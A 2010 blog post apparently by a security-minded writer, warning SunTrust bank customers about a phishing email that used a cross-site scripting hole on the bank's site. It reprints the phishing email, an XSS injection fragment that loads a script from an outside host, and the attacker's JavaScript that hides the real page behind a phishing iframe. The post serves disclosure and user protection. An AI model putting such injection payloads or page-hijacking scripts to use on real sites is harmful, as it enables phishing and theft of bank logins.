Franklin Veaux (tacit) wrote,
Franklin Veaux

  • Mood:

OUCH! SunTrust's Web site is PWN3d!

I know some of my regular readers have accounts with SunTrust bank. If you do, and you recently received an email telling you that your account records need to be updated, and you clicked on any link in that email, change your account password IMMEDIATELY. It is not necessary for you to have typed in your account username and password at the prompt; the attack can lift the SunTrust cookies from your browser.

You see, SunTrust left a security hole in their Web server; this security hole allows an attacker to use what's called a "cross site scripting" attack to take control of the pages you see when you browse to SunTrust URLs.

I have confirmed this security hole exists, and have created a quick demo to show how it works. If you click on this link:

Clicky here
[EDIT:] Within 5 minutes of my making this post, LiveJournal's servers flagged the link as a cross-site scripting link and disabled it. Nicely done! Kudos to the LJ team for making their software aware of hostile links. If you want to try out my demo of the vulnerability, copy into your browser:

you will be taken to the Web site, a legitimate SunTrust Web page.

[UPDATE]: As of Wednesday afternoon, SunTrust's IT people have fixed the XSS hole.

But wait! What do you see? If the security hole still exists when you visit this URL, you'll see a red Web page reading "The cross-site scripting vulnerability at IS STILL ACTIVE". What's going on?

What's going on is that can be fooled just by manipulating the URL into loading content from anywhere on the Web, overwriting whatever is supposed to be there. No, I don't have access to the SunTrust servers directly, and neither does the attacker. What I CAN do is create a Web page with anything I want, and then create a link that causes my Web page to load at in place of what is supposed to be there. And, if I wanted to, I could also read SunTrust cookies stored in your browser as well, presumably including login cookies if you have ticked the "remember me" checkbox on SunTrust's login page.

In English, that means you can not trust anything you see displayed at, even if you are 100% positive that the URL of your browser is in fact It is trivial to create malicious links that change the content displayed at, as I haveshown in my example. This security hole is currently being used in a "phishing" attack that shows you what looks like a perfectly legitimate login page at, but is in fact a page under the control of the hacker on a hacked Web server in Australia.

The attack is currently using a phony email with the title "Your account records have not been updated for too long". This email looks like a bog-standard phishing attack of the kind we all see fifteen or twenty times a day. The full email looks like this:

Return-Path: <>
Received: from ( []) by (v129.4) with ESMTP id MAILINDE061-5eb64bf34aeb237; Tue, 18 May 2010 22:20:27 -0400
Received: from ( [])
by (Internet Inbound) with ESMTP id 521D03800009D
for <>; Tue, 18 May 2010 22:20:27 -0400 (EDT)
Received: from saojorge by with local (Exim 4.69)
(envelope-from <>)
id 1OEVAI-0005bM-Di
for; Tue, 18 May 2010 19:21:06 -0300
Subject: Your account records have not been updated for too long
MIME-Version: 1.0
Content-type: text/html; charset=UTF-8
From: SunTrust <>
Message-Id: <>
Date: Tue, 18 May 2010 19:21:06 -0300
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname -
X-AntiAbuse: Original Domain -
X-AntiAbuse: Originator/Caller UID/GID - [1063 32007] / [47 12]
X-AntiAbuse: Sender Address Domain -
x-aol-global-disposition: S
x-aol-sid: 3039ac1d60584bf34aeb424c
X-Mailer: Unknown (No Version)

<div style="padding:15px;font-family:arial;font-size:12px"><p style="margin:0 0 15px 0"><b>Hello tacitr,</b></p>
<p style="margin:0 0 20px 0"><span style="font-size:14px;color:red"><b>Your account records haven't been updated for too long</b></span><br><br>
Please note that some of your personal information might be outdated.<br>To reactivate your account, please visit our Help Center:</p>
<p style="margin:0 0 20px 0"><a href="" target="_blank"></a></p><p style="margin:0 0 20px 0">Best regards,<br>SunTrust Customer Service<br><br>
<span style="color:gray">SunTrust Bank,<br>P.O. Box 4418 GA-Atlanta-0795,<br>Atlanta, GA 30302-4418</span></p></div>

The interesting thing you will notice about this phish, which makes it very different from garden-variety phishing attacks, is that it actually contains a real SunTrust URL. The SunTrust Web page at

contains a type of security hole known as a "cross-site scripting flaw". In simple terms, it means that the Web page is poorly created in such a way that I can trick it into loading and running a JavaScript from anywhere on the Web.

In this case, what happens is that the Web page at is being used to load and run a JavaScript located at Look closely at the URL in the attack email. See all the junk after the question mark? Most of that junk is bogus, just there to throw off non-technical Web users.

The URL in the email can be divided into several parts: so on)...&TOPNAME=%22%3E%3C/a%3E%3Cscript%20src=%22http:// so on)...

The stuff in blue is the SunTrust Web page. The stuff after that is made up of things that are given to the Web page so that it knows what to do. Normally, it would just be the first part in red, which I imagine would be a number corresponding to a text file to display.

Ah, but the part in green...

The Web designers at SunTrust did not check to see what was being passed to the Web page. The Web page will blindly accept and execute anything that it is passed. The part in green is the address of a malicious JavaScript. When it is passed to the Web page, the Web page executes the script, without regard to where it came from, and displays the result.

Here is the contents of the malicious script:

document.title = 'SunTrust - Identification';

document.write('html {');
document.write('height: 100%;');
document.write('overflow: hidden;');
document.write('body {');
document.write('overflow: hidden;');
document.write('height: 100%;');
document.write('margin: 0;');
document.write('iframe {');
document.write('border: 0;');
document.write('overflow: auto;');
document.write('overflow-x: hidden;');
document.write('margin: 0;');
document.write('width: 100%;');
document.write('height: 100%;');
document.write('body table {');
document.write('display: none;');

document.write('<iframe id="mainframe" name="mainframe" src="" frameborder="0" border="0"></iframe>');

window.onload = function() {
var frm = document.getElementById('mainframe');

If you don't know JavaScript, basically what this script instructs the page to do is:

1. Change the title of the page to read "SunTrust: identification";
2. Hide the content of the page;
3. Load new content from and show it.

The Web site at is a hacked site that the hacker has placed a phish page on. So the email contains a real SunTrust Web site address, with instructions to load a script that will blank out the page and replace it with the phish page. The hacker's phish page also attempts to load any SunTrust cookies, if it can.

You can see the results by clicking on the link I've placed above, which replaces the script at with a script located on my server, which loads a red page reading "The cross-site scripting vulnerability at IS STILL ACTIVE." If you click on my link, you'll see the real SunTrust page load, then the screen will flicker as my script loads, then the page will turn red and show you the warning. If you just go to without any parameters, you'll see the page you should see. I've written to SunTrust to notify them that they have a security problem. Normally, I would not describe the problem or how it works until after they fix it. However, in this case, the security problem has already been discovered by the hacker underground and is being used in current, active attacks, so attempting to keep it secret at this point is pretty useless.
Tags: computer security
  • Post a new comment


    default userpic

    Your reply will be screened

    Your IP address will be recorded 

    When you submit the form an invisible reCAPTCHA check will be performed.
    You must follow the Privacy Policy and Google Terms of use.